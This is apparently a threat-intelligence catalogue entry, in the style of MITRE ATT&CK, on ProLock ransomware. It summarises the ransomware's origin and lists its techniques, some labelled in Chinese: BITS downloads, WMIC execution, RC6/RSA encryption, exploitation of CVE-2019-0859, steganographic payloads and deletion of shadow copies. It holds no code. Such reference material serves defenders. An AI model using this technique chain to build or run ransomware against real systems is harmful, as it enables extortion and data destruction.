1. Home
  2. Software
  3. ProLock

ProLock

ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.[1]

ID: S0654
Type: MALWARE
Platforms: Windows
Version: 1.0
Created: 30 September 2021
Last Modified: 15 October 2021
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1197 BITS任务

ProLock can use BITS jobs to download its malicious payload.[1]
Enterprise T1047 Windows管理规范

ProLock can use WMIC to execute scripts on targeted hosts.[1]
Enterprise T1486 数据加密以实现影响

ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.[1]
Enterprise T1068 权限提升漏洞利用

ProLock can use CVE-2019-0859 to escalate privileges on a compromised host.[1]
Enterprise T1027 .003 混淆文件或信息: Steganography

ProLock can use .jpg and .bmp files to store its payload.[1]
Enterprise T1070 .004 移除指标: File Deletion

ProLock can remove files containing its payload after they are executed.[1]
Enterprise T1490 系统恢复抑制

ProLock can use vssadmin.exe to remove volume shadow copies.[1]

References

  1. Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.